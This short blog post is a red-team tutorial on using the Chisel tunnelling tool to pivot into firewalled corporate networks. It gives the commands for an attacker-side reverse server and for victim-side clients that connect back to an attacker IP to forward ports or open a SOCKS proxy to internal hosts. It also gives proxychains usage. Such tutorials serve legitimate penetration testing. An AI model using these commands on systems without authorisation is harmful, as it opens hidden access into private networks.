Chisel – Favourite red team tool

Chisel

Introduction

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable for both client / server connection. More details about this tool can be found here.

Why is it useful ?

Corporate network is not accessible from internet and its blocked by firewall. Chisel is helpful creating the proxy connection and chisel can make connection to any internal network which is accessible from the box.

How to use?

Download the chisel executable on the attack and victim machine. Normally access to victim machine via reverse shell .

On Attacker Machine, standup the Chisel Server on port 8081

Chisel Server -p 8081 --reverse

On victim machine, multiple ways to launch the chisel client

Chisel Client <attackerip>:8081 R:80:<Target internal network>:<Target internal port>

Above command makes attacker machine listens on port 80 and forwards all the connection to victim’s target machine on specified port

chisel client <attacker-ip>:8081 R:socks

Above command creates socks5 listener on attacker machine on 1080 port and then connects to victim’s internal machine. Accessible via proxychains and foxyproxy browser.

e.g. proxychains git clone <victim’s internal ip> or proxychains curl <victim’s internal ip>

Conclusion

Chisel is swiss army knife and its red team favourite tool to establish proxy connections to internal network where its mostly blocked by the firewall.


Posted

in

by

Tags: